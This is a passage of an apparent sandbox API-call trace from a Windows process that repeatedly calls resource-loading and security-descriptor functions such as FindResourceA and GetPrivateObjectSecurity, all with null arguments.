ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.860] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.860] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.860] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.860] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.860] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.860] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.860] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.860] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.860] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.860] LockResource (hResData=0x0) returned 0x0 [0219.860] FreeResource (hResData=0x0) returned 0 [0219.860] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.861] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.861] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.861] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.861] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.861] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.861] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.861] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.861] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.861] LockResource (hResData=0x0) returned 0x0 [0219.861] FreeResource (hResData=0x0) returned 0 [0219.861] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.861] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.861] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.861] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.861] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.862] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.862] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.862] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.862] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.862] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.862] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.862] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.862] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.862] LockResource (hResData=0x0) returned 0x0 [0219.862] FreeResource (hResData=0x0) returned 0 [0219.862] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.862] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.863] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.863] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.863] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.863] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.863] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.863] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.863] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.863] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.863] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.863] LockResource (hResData=0x0) returned 0x0 [0219.863] FreeResource (hResData=0x0) returned 0 [0219.863] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.863] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.863] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.864] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.864] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.864] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.864] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.864] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.864] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.864] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.864] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.864] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.864] LockResource (hResData=0x0) returned 0x0 [0219.864] FreeResource (hResData=0x0) returned 0 [0219.864] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.865] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.865] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.865] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.865] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.865] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.865] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.865] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.865] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.865] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.865] LockResource (hResData=0x0) returned 0x0 [0219.865] FreeResource (hResData=0x0) returned 0 [0219.865] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.865] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, 